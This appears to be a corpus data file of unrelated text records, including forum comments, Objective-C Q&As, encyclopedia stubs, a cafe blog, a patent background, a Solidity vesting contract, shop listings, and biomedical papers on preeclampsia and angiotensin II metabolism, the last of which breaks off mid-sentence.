stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.", "Robert Shillabeer\n\nSeems I've over stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.", "\n\nScore: 0\n\nDoberman1\n3:06pm Thu 25 Oct 12\n\nRobert Shillabeer wrote…\n\nSeems I've over stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.", "\n\nNo one has insulted you Robert, you may try and remember that. ", "The credibility of your debate vanishes when you resort to insults, no matter how you try and justify it.", "\n\n[quote][p][bold]Robert Shillabeer[/bold] wrote:\nSeems I've over stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.[/p][/quote]No one has insulted you Robert, you may try and remember that. ", "The credibility of your debate vanishes when you resort to insults, no matter how you try and justify it.", "Doberman1\n\nRobert Shillabeer wrote…\n\nSeems I've over stepped the bounds of fair comment, the moderators have been in touch. ", "No offence was intended but suffice to say its a two way road. ", "I will observe the moderators comments and expect other to do the same, I am entitled to my view so please fair comment in future.", "\n\nNo one has insulted you Robert, you may try and remember that. ", "The credibility of your debate vanishes when you resort to insults, no matter how you try and justify it.", "\n\nScore: 0\n\nRobert Shillabeer\n9:51pm Thu 25 Oct 12\n\nTo be accused of burying ones head in the sand among other untruths is to me an insult. ", "I took quite a bit even being accused of being DE's wife, how mush more insults does it take to get one so damned annoyed I even angered the moderator. ", "Rough nerves perhaps but one can go too far.", "\n\nTo be accused of burying ones head in the sand among other untruths is to me an insult. ", "I took quite a bit even being accused of being DE's wife, how mush more insults does it take to get one so damned annoyed I even angered the moderator. ", "Rough nerves perhaps but one can go too far.", "Robert Shillabeer\n\nTo be accused of burying ones head in the sand among other untruths is to me an insult. ", "I took quite a bit even being accused of being DE's wife, how mush more insults does it take to get one so damned annoyed I even angered the moderator. ", "Rough nerves perhaps but one can go too far.", "\n\nIpsoregulated\n\nThis website and associated newspapers adhere to the Independent Press Standards Organisation's Editors' Code of Practice. ", "If you have a complaint about the editorial content which relates to inaccuracy or intrusion, then please contact the editor here. ", "If you are dissatisfied with the response provided you can contact IPSO here" ]
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[ "Q:\n\nallocating multiple instance of the same class on the same line\n\n@interface Velocity2 : UIViewController {\nUILabel * answerLabel;\nUITextField * varA,varB,varC;\n\nIs this legal to do or is below the only way to do it?", "\n UITextField * varA;\n UITextField * varB;\n UITextField * varC;\n\nA:\n\nLegal:\nUITextField *varA, *varB, *varC;\n\n" ]
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[ "Otar Kushanashvili\n\nOtar Shalvovich Kushanashvili (; born 22 June 1970, Kutaisi) is a Georgian and Russian music journalist and broadcaster who describes himself as \"anti-publicist\".", "\nHe is known for his provocative and outrageous antics.", "\n\nIn 2004, during a match between Russia and Portugal in the Euro 2004 soccer ran onto the field to protest the removal of the game goalkeeper Sergei Ovchinnikov. ", "During the run to the judge he was fined €2,500 and sentenced to two years' probation.", "\n\nReferences\n\nExternal links\n Official website\n Блог\n\nCategory:1970 births\nCategory:Living people\nCategory:People from Kutaisi\nCategory:Russian television presenters\nCategory:Ukrainian television presenters\nCategory:Russian journalists\nCategory:Russian music journalists\nCategory:Russian music critics\nCategory:Journalists from Georgia (country)\nCategory:Russian columnists\nCategory:Russian reporters and correspondents\nCategory:Russian people of Georgian descent\nCategory:Streakers" ]
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[ "Archive for March, 2013\n\nStreaming Cafe is proud to announce a Three Day Showcase of Art, Music, and Coffee Culture: a celebration of creative community in KelownaApril 18-20, 2013. ", "The three day event will feature community driven events, live music, & visual arts.", "\n\nWhere entrepreneurial minds come together to solve problems with creativity.", "\nmore info @ Facebook Event\n\nMeeple Board Game Night 6:30pm Free!", "\n\nLaunching a monthly marathon of minds-port mania. ", "An evening of board game play.", "\nBe sure to follow along on Twitter with #GameNightKL\nmore info @Facebook Event\n\nFRIDAY, APRIL 19Visual Art Spotlight 6:00pm Free!", "\n\nStreaming Cafe will be transformed into a gallery setting complete with a featured wine, craft beef and live DJ Rich Taylor. ", "The spotlight will feature three dynamic visual artists who have previously displayed works at Streaming Cafe.", "\n\nPrairie Dance Club’s music has been described as Sonic Canadiana. ", "This Langley quartet’s unique blend of alternative folk rock is grounded in timeless melody and has steadily been winning over listeners since the band’s formation in the fall of 2007. ", "The band has had their music in TV shows such as America’s Next Top Model and MTV’S 16 and Pregnant. ", "Their song “Spring” was also featured in the PBS series Road Trip Nation. ", "They were also a top ten finalist in the Shore 104.3′s Song Search competition for 2011.", "\n\nRecently JJ was the recipient of Rawlco Radio’s 10k20 Grant Program in his hometown of Calgary, Alberta. ", "Following the grant, he recorded his first full length album which will be released April 17th, 2012. ", "Recorded at Five Acres Studios in Aldergrove, B.C. with the help of producer Ryan Mcallister (Dakona, Cowboys and Indians, Maverick Records), the album showcases heartfelt moments full of life experience, right alongside bursts of boisterous feel-good rock and roll.", "\n\nRaquel WarcholSinger-songwriter Raquel Warchol hails from Vernon, B.C. and is a talented up-and-coming artist with a panache for the guitar. ", "At just 19 years old, Raquel is ready to share her music. ", "She recently recorded four new songs in Nashville with two-time Grammy winner Chad Carlson and will be back in the studio this month (January 2013) to record additional songs. “", "I love to perform and am excited to play the new tunes live for music lovers at Canadian music festivals and various shows coming up in the new year.”", "\n\nWe’re really excited about the latest beans that have come today from Matchstick Coffee (Vancouver), their “Kanzu” from Rwanda. ", "The Kanzu washing station receives cherries from more than a hundred small hold farmers!!", "\n\nOnce delivered, the cherries are de-pulped using disc pulpers. ", "The coffee is then fermented for up to 24 hours before being washed and then soaked overnight. ", "Initial drying takes places under shade for 2 days before being transfered to raised drying tables under the sun for the remainder of the drying (7-14 days). ", "These long fermentation times, extra soaking and two-phase drying require more work and resources. ", "However, as in most things, the extra effort results in a superior product.", "\n\nStreaming Cafe is very excited to have the works of Dylan Ranney on our walls for the month of March. ", "Dylan’s display is a collection of human portraits, featuring many generations, nationalities and themes. ", "All of the works are for sale, so please be sure to come down to the cafe to see the incredible pieces in person!", "\n\nDylan Ranney is a Vancouver born visual and performing artist who moved to Kelowna at the age of 10, and has over the past 4 years contributed as a local artist in the Okanagan. ", "Dylan has enjoyed over a decade as a performing percussionist in the valley, He is an avid traveler, hiker, and global citizen at heart. ", "He has exhibited work in several shows in various Okanagan galleries including the Vertigo Gallery, and the UBCO FINA Gallery, and a solo painting exhibition at the Alternator Center for Contemporary Art. ", "Ranney has done several commissioned paintings, and took part in the Mad Hatter installation project under Byron Johnston. ", "Dylan also paints public murals as a collaborative duo with local artist Liz Dumontet.", "\n\nDylan volunteers at Thrive Afterschool Club, working as a child-care attendant and program coordinator with seven years prior experience working with kids at various summer camps and mentoring programs.", "\n\nDylan recently displayed work at the “Exhibition from the In-Between World” held at the Okanagan French Cultural Centre, and also at this years Ecotone festival held at the Rotary Centre for the Arts. ", "Currently, Dylan Ranney is exhibiting paintings at the Streaming Cafe on Leon Ave. ", "in Kelowna until the end of March, 2013. ", "Ranney is also active in the Kelowna music scene as drummer with ambient rock band, ‘Oceans Apart’. ", "Look for ‘Oceans Apart’ this coming summer at ‘Parks Alive’." ]
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[ "Q:\n\nHow can I initialize a date to NSdate?", "\n\nI want to give, for example, 12/11/2005 in the format of mm/dd/yyyy. ", "Can I initialize 12/11/2005 to NSDate directly? ", "Any help?", "\nit gives a warning and crashes when I declare it as\nNSDate *then = [NSDate dateWithNaturalLanguageString:02/11/2009 locale:nil];\n\nA:\n\nWhat you need to do is something like this:\nNSDateFormatter *mmddccyy = [[NSDateFormatter alloc] init];\nmmddccyy.timeStyle = NSDateFormatterNoStyle;\nmmddccyy.dateFormat = @\"MM/dd/yyyy\";\nNSDate *d = [mmddccyy dateFromString:@\"12/11/2005\"];\nNSLog(@\"%@\", d);\n\n" ]
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[ "Taleghani Metro Station\n\nTaleghani Metro Station is a station in Tehran Metro Line 1. ", "It is located in the junction of Taleghani Ave and Dr. Mofatteh Street. ", "It is between Darvaze Dolat Metro Station and Haft-e-Tir Metro Station.", "\n\nCategory:Tehran Metro stations" ]
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[ "The applicant claims as a filing date, the date on which this application was received by the United States Patent Office. ", "There are no co-pending related applications filed by the applicant as of the date of filing of this application.", "\n1. ", "Field of Invention\nThis invention pertains to an instrument for computing proportions or fractions of an originally printed, published or displayed recipe to a fraction of the fixed number of servings indicated by the recipe.", "\n2. ", "Background\nIn 1936 Lane et al. ", "received U.S. Pat. ", "No. ", "2,098,394 for a recipe file which was an improved combination of a container, data and index cards useful in the assembly and examination of cooking recipes. ", "Pivotally mounted on an index card by an eyelet was an information disc divided into a series of equal spaces around the periphery to coincide with an opening cut in the top edge of the index card. ", "In 1937, Kohlenberger in U.S. Pat. ", "No. ", "2,111,268 invented a further improvement in the art of cooking by providing a novel means by which the exact time for cooking various vegetables and the like may be ascertained by a rotatably moving disc with an indicator pointing the vegetable desired. ", "In 1940 Walmsley was issued U.S. Pat. ", "No. ", "2,190,814 for a reference cabinet which accurately specified the kind and amounts of ingredients for a desired xe2x80x9csizexe2x80x9d as a measure or weight of a batch or mixture, covering a complete variety of baking formulas and adapted specifically for use in a shop routine. ", "In 1939 Herzog received U.S. Pat. ", "No. ", "2,150,442 for a calorie counting pivoting wheel or calculator permitting the ready addition of the number of calories contained in combinations of foods in any variety.", "\nIn 1947 Torrence received U.S. Pat. ", "No. ", "2,420,762 for wheeled pivoting device with discs arranged one above the other to indicate the value of vitamins and minerals in certain types of foods. ", "Then, in 1960 Pennington received U.S. Pat. ", "No. ", "2,956,358 for pivoting wheeled disc device for menu selection wherein weight is given to the chemistry of the foods selected and wherein the use of seasonal foods at the wrong time of year is avoided using the device. ", "A similar nutrition indicating device was described in U.S. Pat. ", "No. ", "3,977,106 in 1976 where a flat circular chart with a flat wheel rotatably pivoted at each side of the chart wherein foods are colored coded on the chart and the relative quantities of food items to provides specific calories or nutrients is shown. ", "A related device of similar construction was patented in 1977 in U.S. Pat. ", "No. ", "4,048,477 which issued to Hungerford. ", "The device is a hand held weight control calculator which allows an individual to quickly and accurately determined the daily maximum food calories allowed for maintaining, gaining, or losing weight." ]
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[ "Synopsis\n\nPriscilla Gilman had the greatest expectations for the birth of her first child. ", "Growing up in New York among writers and artists, Gilman experienced childhood as a whirlwind of imagination and creative play. ", "Later, as a student and scholar of Wordsworth, she embraced the poet's romantic view of children—and eagerly anticipated her son's birth, certain that he, too, would come \"trailing clouds of glory.\" ", "But her romantic vision would not be fulfilled in the ways she dreamed. ", "Though Benjamin was an extraordinary child, the signs of his remarkable precocity were also manifestations of a developmental disorder that would require intensive therapies and special schooling, and would dramatically alter the course Priscilla had imagined for her family.", "\n\nIn The Anti-Romantic Child, a memoir full of lyricism and light, Gilman explores the complexity of our hopes for our children, our families, and ourselves, and the ways in which experience can lead us to reimagine those hopes and expectations. ", "Using Wordsworth's poetry as a touchstone, she speaks intimately of her poignant journey through crisis and disenchantment to a place of peace and resilience. ", "Gilman illuminates the flourishing of life that occurs when we embrace the unexpected, and shows how events and situations often perceived as setbacks can actually enrich us. ", "The Anti-Romantic Child is a courageous and inspiring synthesis of memoir and literature, one that resonates long after you finish the last page.", "\n\nThe Anti-Romantic Child, Gilman's first book, was excerpted in Newsweek magazine and featured on the cover of its international edition in April 2011. ", "It was an NPR Morning Edition Must-Read, Slate's Book of the Week, selected as one the Best Books of 2011 by the Leonard Lopate Show, and chosen as a Best Book of 2011 by The Chicago Tribune. ", "The Anti-Romantic Child was one of five nominees for a Books for a Better Life Award for Best First Book." ]
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[ "pragma solidity ^0.4.11;\n\n/*\n Copyright 2017, Jordi Baylina\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.", "\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ", " See the\n GNU General Public License for more details.", "\n\n You should have received a copy of the GNU General Public License\n along with this program. ", " If not, see <http://www.gnu.org/licenses/>.", "\n */\n\n/// @title DevTokensHolder Contract\n/// @author Jordi Baylina\n/// @dev This contract will hold the tokens of the developers.", "\n/// Tokens will not be able to be collected until 6 months after the contribution\n/// period ends. ", "And it will be increasing linearly until 2 years.", "\n\n\n// collectable tokens\n// | _/-------- vestedTokens rect\n// | _/\n// | _/\n// | _/\n// | _/\n// | _/\n// | _/\n// | _/\n// | |\n// | . ", "|\n// | . ", " |\n// | . ", " |\n// +===+======+--------------+----------> time\n// Contrib 6 Months 24 Months\n// End\n\n\nimport \"./MiniMeToken.sol\";\nimport \"./StatusContribution.sol\";\nimport \"./SafeMath.sol\";\nimport \"./ERC20Token.sol\";\n\n\ncontract DevTokensHolder is Owned {\n using SafeMath for uint256;\n\n uint256 collectedTokens;\n StatusContribution contribution;\n MiniMeToken snt;\n\n function DevTokensHolder(address _owner, address _contribution, address _snt) {\n owner = _owner;\n contribution = StatusContribution(_contribution);\n snt = MiniMeToken(_snt);\n }\n\n\n /// @notice The Dev (Owner) will call this method to extract the tokens\n function collectTokens() public onlyOwner {\n uint256 balance = snt.balanceOf(address(this));\n uint256 total = collectedTokens.add(balance);\n\n uint256 finalizedTime = contribution.finalizedTime();\n\n require(finalizedTime > 0 && getTime() > finalizedTime.add(months(6)));\n\n uint256 canExtract = total.mul(getTime().sub(finalizedTime)).div(months(24));\n\n canExtract = canExtract.sub(collectedTokens);\n\n if (canExtract > balance) {\n canExtract = balance;\n }\n\n collectedTokens = collectedTokens.add(canExtract);\n assert(snt.transfer(owner, canExtract));\n\n TokensWithdrawn(owner, canExtract);\n }\n\n function months(uint256 m) internal returns (uint256) {\n return m.mul(30 days);\n }\n\n function getTime() internal returns (uint256) {\n return now;\n }\n\n\n //////////\n // Safety Methods\n //////////\n\n /// @notice This method can be used by the controller to extract mistakenly\n /// sent tokens to this contract.", "\n /// @param _token The address of the token contract that you want to recover\n /// set to 0 in case you want to extract ether.", "\n function claimTokens(address _token) public onlyOwner {\n require(_token !", "= address(snt));\n if (_token == 0x0) {\n owner.transfer(this.balance);\n return;\n }\n\n ERC20Token token = ERC20Token(_token);\n uint256 balance = token.balanceOf(this);\n token.transfer(owner, balance);\n ClaimedTokens(_token, owner, balance);\n }\n\n event ClaimedTokens(address indexed _token, address indexed _controller, uint256 _amount);\n event TokensWithdrawn(address indexed _holder, uint256 _amount);\n}\n" ]
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[ "Welcome to our Online Quilt Shop!", "\n\n18mm Blade Cutter Rty-4The blade is made of high quality stainless steel for unparalleled sharpness and superior edge retention. ", "Designed for both right and left-handed user. ", "Great size for taking with you to class, perfect for intricate and detailed cutting\n\nSale Price:$13.29$11.30each\n\n18mm Blade RB18-2Replacement blade for 18mm rotary cutter used for quilting, sewing, scrapbooking, and general crafts. ", "Perfect for intricate and detailed cutting, this blade is ideal for small-scale projects, and for cutting curved pieces and tight corners. ", "It's sharp enough to handle the toughest material, made of stainless steel for sharpness and durability. ", "2 blades per pack\n\nSale Price:$7.99$6.79each\n\n28mm Blade Cutter Rty-1This cutter features a durable handle with a blade cover for safety. ", "The cutter is a rolling razor blade used to cut fabrics into shapes, strips and pieces for sewing, quilting and craft projects. ", "The blade is made of high quality tungsten carbide tool steel for unparalleled sharpness and superior edge retention. ", "Designed for both right- and left-handed use.", "\n\nSale Price:$15.99$13.59each\n\n28mm Blade RB28-2Replacement blade for 28mm rotary cutters used for quilting, sewing, and general crafts. ", "Ideal for small-scale projects and tight corners. ", "This blade is made of high quality tungsten tool steel for unparalleled sharpness and superior edge retention. ", "2 blades per pack\n\n60mm Blade Cutter Rty-3Cutter is sharp enough to cut through 6 layers of fabric and difficult materials. ", "Features a durable handle with a blade cover for safety. ", "The blade is made of high quality tungsten carbide tool steel for unparalleled sharpness and superior edge retention. ", "Designed for both right- and left-handed use." ]
{ "pile_set_name": "Pile-CC" }
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Guided Relaxation\n\nGuided Relaxation\n\n5.99\n\nLearn to relax with this guided relaxation. ", "This recording which has been designed with binaural background beats, will guide you through a series of techniques to bring you from stressful to stress-free.", "\n\nThis recording an also serve to help you begin to acclimate to what hypnosis feels like should you be preparing for in session work." ]
{ "pile_set_name": "Pile-CC" }
[ 0, 0, 0 ]
[ "Transportation\n\nDELIVERING SUSTAINABLE SOLUTIONS\n\nTrisec maintains constant focus on quality service and professionalism while working diligently to continually exceed your expectations. ", "Our support staff provides the knowledge, direction and tools to make sure we maintain a high standard of safety and integrity. ", "Trisec’s experienced, professional drivers ensure our commitment to excellent service.", "\n\nThe use of our high end TMS tracking and search tools along with our in cab communications, improves customer service. ", "Trisec transportation service operates at a 99.9% on time delivery with zero cargo claims history which adds to our customers bottom line." ]
{ "pile_set_name": "Pile-CC" }
[ 0.0106951871657754, 0, 0.011627906976744186, 0.008264462809917356, 0.007246376811594203 ]
[ "Unsupervised Placental Gene Expression Profiling Identifies Clinically Relevant Subclasses of Human Preeclampsia.", "\nPreeclampsia (PE) is a complex, hypertensive disorder of pregnancy, demonstrating considerable variability in maternal symptoms and fetal outcomes. ", "Unfortunately, prior research has not accounted for this variability, resulting in a lack of robust biomarkers and effective treatments for PE. ", "Here, we created a large (N=330) clinically relevant human placental microarray data set, consisting of 7 previously published studies and 157 highly annotated new samples from a single BioBank. ", "Applying unsupervised clustering to this combined data set identified 3 clinically significant probable etiologies of PE: \"maternal\", with healthy placentas and term deliveries; \"canonical\", exhibiting expected clinical, ontological, and histopathologic features of PE; and \"immunologic\" with severe fetal growth restriction and evidence of maternal antifetal rejection. ", "Moreover, these groups could be distinguished using a small quantitative polymerase chain reaction panel and demonstrated varying influence of maternal factors on PE development. ", "An additional subclass of PE placentas was also revealed to form because of chromosomal abnormalities in these samples, supported by array-based comparative genomic hybridization analysis. ", "Overall, our findings represent a new paradigm in our understanding of the origins and maternal-placental contributions to the pathology of PE. ", "The study of PE represents a unique opportunity to access human tissue associated with a complex hypertensive disorder, and our novel approach could be applied to other hypertensive and heterogeneous human diseases." ]
{ "pile_set_name": "PubMed Abstracts" }
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[ "Introduction\n============\n\nDysregulation of angiotensin II (AngII)-dependent neuronal signaling in the central nervous system is involved in the pathogenesis of cardiovascular diseases, such as hypertension and chronic heart failure (Phillips and Sumners [@b29]; Veerasingham and Raizada [@b37]; Guyenet [@b15]; Zucker [@b47]). ", "Activation of the renin--angiotensin system and elevated levels of AngII in the brain are associated with the development and maintenance of various forms of experimental and genetic models of hypertension (Basso et al. [", "@b3]; Ganten et al. [", "@b10]; Davisson et al. [", "@b7]; Morimoto et al. [", "@b27]). ", "By acting on specific brain regions that are important in autonomic control of cardiovascular function, including the subfornical organ (SFO), paraventricular nucleus (PVN), and rostral ventrolateral medulla (RVLM), AngII increases neuronal firing leading to the deleterious sympathoexcitation commonly associated with neurocardiovascular diseases (Bains et al. [", "@b2]; Ferguson and Bains [@b9]; Gao et al. [", "@b11]; Feng et al. [", "@b8]). ", "In addition, AngII stimulation of its type I receptor (AT~1~R) in these cardiovascular control brain regions and others contributes to vasopressin secretion, thirst and salt appetite, and baroreflex modulation (Matsukawa et al. [", "@b25]; Reid [@b30]; Johnson and Thunhorst [@b22]). ", "AngII can also activate its type 2 receptor (AT~2~R) on central neurons, which often results in opposing responses compared to AT~1~R activation, reflecting the different physiological and pathophysiological roles of AngII mediated via these receptors (Sumners et al. [", "@b33]).", "\n\nConsidering the importance of AngII intraneuronal signaling in the pathogenesis of neurocardiovascular diseases, including hypertension and heart failure, numerous studies have been devoted to better understand the precise signaling pathways involved in an attempt to identify new therapeutic targets for these diseases. ", "However, there are significant technical challenges in studying AngII-induced intraneuronal signaling in vivo in animal models of hypertension and heart failure such as: (1) limited number of neurons within a specific cardiovascular control brain region of interest to perform a particular assay; (2) separating intraneuronal signaling events from other pathways activated in neighboring cells including glia and endothelial cells; and (3) separating the signaling mechanisms of other peptides and hormones associated with these diseases from those directly induced by AngII. ", "To circumvent these challenges, neuronal cell culture models have been frequently utilized to examine the specific intraneuronal signaling pathways induced by AngII. ", "Such studies have clearly identified important roles for calcium, reactive oxygen species, kinases, and transcription factors in the AngII intraneuronal signaling pathway (Sun et al. [", "@b36]; Zimmerman et al. [", "@b45], [@b46]; Haack et al. [", "@b18]).", "\n\nNevertheless, there are also limitations in using neuronal cell culture models to recapitulate the AngII intraneuronal signaling events occurring in vivo such as: (1) neuronal cells are often immortalized and/or isolated from a tumor; (2) cells are usually cultured in a hyperoxic environment (i.e., 21% oxygen) as compared to their in vivo environment (1--4% oxygen); and (3) the lack of neighboring glia and endothelial cells may alter a particular response in the cultured neurons that would normally occur in vivo. ", "A fourth limitation in using neuronal cell culture models as it specifically relates to understanding AngII intraneuronal signaling is the lack of evidence indicating the stability of exogenous AngII in neuronal cell culture media. ", "Many studies have examined intra-neuronal responses, such as changes in mRNA levels and protein expression, 1--48 h after a single administration of exogenous AngII into the neuronal cell culture media (Liu et al. [", "@b23]; Mitra et al. [", "@b26]; Xia et al. [", "@b40]). ", "Data from these studies are often interpreted to indicate that the observed changes are also occurring in neurons of various hypertensive and heart failure models in which circulating and/or brain levels of AngII are chronically elevated (van de Wal et al. [", "@b38]; Xia et al. [", "@b41]). ", "However, it remains unclear if a single treatment of exogenous AngII given to neurons in culture results in a chronic elevation of AngII levels in the media.", "\n\nIn the current study, we tested the hypothesis that exogenous AngII is rapidly metabolized in neuronal cell culture medium and thus fails to remain chronically elevated following a single exogenous administration. ", "We utilized a mouse catecholaminergic neuronal cell line, CATH.a neurons, which express both AT~1~R and AT~2~R. CATH.a neurons have commonly been used by our group and others to study AngII intraneuronal signaling pathways (Sun et al. [", "@b36]; Gao et al. [", "@b12]; Case et al. [", "@b5]). ", "Previous studies have shown that deletion of the AT~1~R from catecholaminergic neurons delays the onset of AngII-dependent hypertension and also reduces the maximal blood pressure response (Jancovski et al. [", "@b20]). ", "In addition, catecholaminergic neurons, such as C1 neurons in the RVLM, play an important role in AngII-induced hypertension and blocking the AT~1~R specifically in these neurons can attenuate the AngII-mediated rise in blood pressure (Jancovski et al. [", "@b21]). ", "Using liquid chromatography-tandem mass spectrometry, we measured levels of AngII and its metabolites, Ang III, Ang IV, and Ang-1-7, in CATH.a neuronal cell culture media after administration of exogenous AngII. ", "Herein, we report that exogenous AngII is rapidly metabolized in CATH.a neuron media with levels returning to near baseline after 3 h of administration. ", "Further, AngII levels in CATH.a neuron media can be significantly and chronically elevated for at least 24 h with the addition of fresh exogenous AngII every 3 h.\n\nMaterials and Methods\n=====================\n\nNeuronal cell culture\n---------------------\n\nMouse catecholaminergic CATH.a neurons (American Type Culture Collection (ATCC), stock no. ", "CRL--11179) were cultured in RPMI 1640 medium supplemented with 8% normal horse serum (NHS), 4% fetal bovine serum, and 1% penicillin-streptomycin at 37°C with 5% CO~2~ as recommended by ATCC. ", "CATH.a neurons were differentiated for 6--8 days before experimentation by adding *N*^*6*^*,2′-O*-dibutyryladenosine *3′,5′* - cyclic monophosphate sodium salt (1 mmol/L, Sigma-Aldrich, St. Louis, MO) to the culture medium as previously described (Case et al. [", "@b5]).", "\n\nLiquid chromatography -- tandem mass spectrometry (LC-MS/MS)\n------------------------------------------------------------\n\nCATH.a neuronal culture medium was collected after incubation (15 min -- 24 h) with AngII (100 nmol/L). ", "The ^13^C- and ^15^N-labeled (Leu, + 7 amu) AngII (H-AngII, Anaspec, Fremont, CA) was added to the media samples at a concentration of 18.2 nmol/L. Proteins were precipitated by addition of 6 volumes of cold neat acetone, typically 50 *μ*L of sample and 300 *μ*L of acetone and stored at −35°C for 1 h. Then, the samples were centrifuged at 4°C for 15 min at 15,000 × *g*. ", "Thereafter, the supernatants were removed and the acetone/water was removed by SpeedVac concentration for 2--3 h at room temperature. ", "The pellet was redissolved into 50 *μ*L of 0.1% formic acid vortexed and centrifuged. ", "The samples were loaded onto V-shaped polyethylene vials (Agilent, Santa Clara, CA) that were previously soaked with 0.1% w/v BSA and dried. ", "The LC-MS/MS method was developed and used for the samples using an Agilent LC1200 HPLC system (Agilent) connected to an ABSciex QTrap4000 (ABSciex, Framingham, MA) operating in the multiple reaction monitoring (MRM) mode with the electrospray operating in the positive mode. ", "Other ion-source conditions were temperature, 500°C, ionization potential, 5500 V, GS1 = 50, GS2 = 25, curtain gas = 30. ", "The transitions monitored and ionization parameters are shown in Table[1](#tbl1){ref-type=\"table\"}. ", "Transitions numbered 1,3,5,8 and 9 were used for quantitation while the remaining ones were used for confirmation of peak assignment. ", "Column chromatography was performed via a 2.1 × 50 mm Kinetex C-18 300 Å (Phenomenex, Torrance, CA) at a flow rate of 250 *μ*L/min with a mobile phase gradient from 98% A (0.1% formic acid in LC-water) to 98% B (0.1% formic acid in acetonitrile) over 20 min, with additional holding at 98% B for 2 min and re-equilibration at 98% A for 10 min. ", "Transitions were monitored with an acquisition time of 100 msec/MRM in the nonscheduled mode. ", "The data were analyzed using Analyst Ver 1.4.2. ", "AngII levels were quantified using H-AngII as a standard. ", "The other angiotensin peptides (Ang III, Ang IV, and Ang-1-7) were quantified by comparison to an external calibration curve of the unlabeled commercially available peptides, and H-AngII was used as a surrogate to correct for concentration loss of the peptides during sample preparation. ", "The recoveries of the spiked H-AngII were equal to or higher than 80% for the analytical method. ", "Individual samples were injected in triplicate and the average angiotensin peptide concentrations and standard error are reported. ", "All reagents used for LC-MS/MS analysis were of Mass Spectrometry Grade and all unlabeled angiotensin peptide standards and reagents were purchased from Sigma-Aldrich (St. Louis, MO).", "\n\n###### \n\nInstrument parameters for multiple reaction monitoring (MRM)\n\n Transition number Peptide Q1 (m/z) Q3 (m/z) Declustering potential, V Collision energy, V\n ------------------- --------- ---------- ---------- --------------------------- ---------------------\n 1 AngII 349.6 255.2 40 30\n 2 AngII 524 784.1 60 30\n 3 H-AngII 352 255.2 40 30\n 4 H-AngII 527.5 791.1 60 30\n 5 AngIII 311.3 256 40 15\n 6 AngIII 311.3 514 30 12\n 7 AngIV 388.3 513.6 50 15\n 8 AngIV 388.3 263.4 45 20\n 9 Ang1-7 301 371 40 15\n 10 Ang1-7 301 344 30 15\n\nTransitions 1, 3, 5, 8, and 9 were used for quantitation while transitions 2, 4, 6, 7, and 10 are for confirming peak assignments.", "\n\nStatistical analysis\n--------------------\n\nAll data are expressed as the mean ± standard error of the mean (SEM) and were analyzed by Student\\'s *t*-test for two-group comparisons or by ANOVA followed by Newman--Keuls correction for multiple comparisons. ", "Statistical analyses were performed using GraphPad Prism 5.0 (La Jolla, CA) statistical and graphical software. ", "Differences were considered significant at *P* \\< 0.05.", "\n\nResults\n=======\n\nUtilizing liquid chromatography -- tandem mass spectrometry to detect angiotensin peptides\n------------------------------------------------------------------------------------------\n\nAngII is generated from angiotensin-converting enzyme (ACE) cleaving angiotensin I, which is produced by renin-induced cleavage of angiotensinogen. ", "Although AngII is considered to be the primary effector peptide of the renin--angiotensin system, AngII can be further metabolized to other angiotensin peptides which have been shown to contribute to cardiovascular function (Campagnole-Santos et al. [", "@b4]; Santos et al. [", "@b32]; Wilson [@b39]; Ruiz-Ortega et al. [", "@b31]; Marc et al. [", "@b24]; Gao et al. [", "@b13]). ", "For example, AngII can be cleaved by angiotensin-converting enzyme 2 (ACE2) to form Ang-1-7 or by aminopeptidase A to form Ang III, which is further metabolized by aminopeptidase N to form Ang IV (Fig.[1](#fig01){ref-type=\"fig\"}). ", "Although the primary objective of this study was to examine the stability of exogenous AngII in neuronal cell culture media, it was also important to determine if exogenous AngII is metabolized to these other angiotensin peptides. ", "As shown in the representative chromatogram (Fig.[2](#fig02){ref-type=\"fig\"}), we were able to successfully separate and detect all four angiotensin peptides from a mixture containing the commercially available peptides ranging in concentration from 12--16 nmol/L. AngII is an octapeptide which under the conditions of the chromatography should accumulate in the +3 charged state due to the positive charges at the terminal amino group as well as the Arg and His side chains. ", "Upon loss of the C-terminus Phe, rendering Ang-1-7, the peptide is much less hydrophobic and thus binds less strongly to the C-18 side chains of the HPLC column particles. ", "Since Phe is more hydrophobic than Asp, removal of Asp instead of Phe from AngII makes the Ang III peptide less hydrophobic than AngII but more than Ang-1-7. ", "Therefore, Ang III elutes between Ang-1-7 and AngII (Fig.[2](#fig02){ref-type=\"fig\"}). ", "The hexapeptide Ang IV is generated from the removal of the N-terminus positive side chain Arg from Ang III, while keeping the hydrophobic residues Ile and Phe. ", "As a result of Ang IV being the most hydrophobic, it has the strongest binding and thus appears as the last peak in the chromatogram (Fig.[2](#fig02){ref-type=\"fig\"}). ", "To accurately quantify the concentration of these peptides in our subsequent studies using media samples from the CATH.a neuronal culture, we utilized ^13^C- and ^15^N-labeled AngII (H-AngII).", "\n\n![", "Schematic of the renin--angiotensin system. ", "AngII is generated by angiotensin-converting enzyme (ACE)-induced cleavage of angiotensin I. AngII is subsequently metabolized to Ang III and Ang-1-7 peptide via aminopeptidase A and angiotensin-converting enzyme 2 (ACE2), respectively. ", "Ang III is further metabolized by aminopeptidase N to generate Ang IV.](phy20003-e12287-f1){#fig01}\n\n![", "Angiotensin peptides detected by liquid chromatography-tandem mass spectrometry. ", "Representative chromatogram showing the detection of individual angiotensin peptides (AngII, Ang III, Ang IV, and Ang-1-7) in a mixture of the commercially available peptides in a concentration ranging from 12--16 nmol/L. ^13^C- and ^15^N-labeled AngII (H-AngII) was also added to the mixture and used to quantify absolute amounts of the angiotensin peptides in the CATH.a neuronal cell culture media samples analyzed in subsequent experiments.](phy20003-e12287-f2){#fig02}\n\nExogenous AngII is rapidly metabolized in CATH.a neuronal 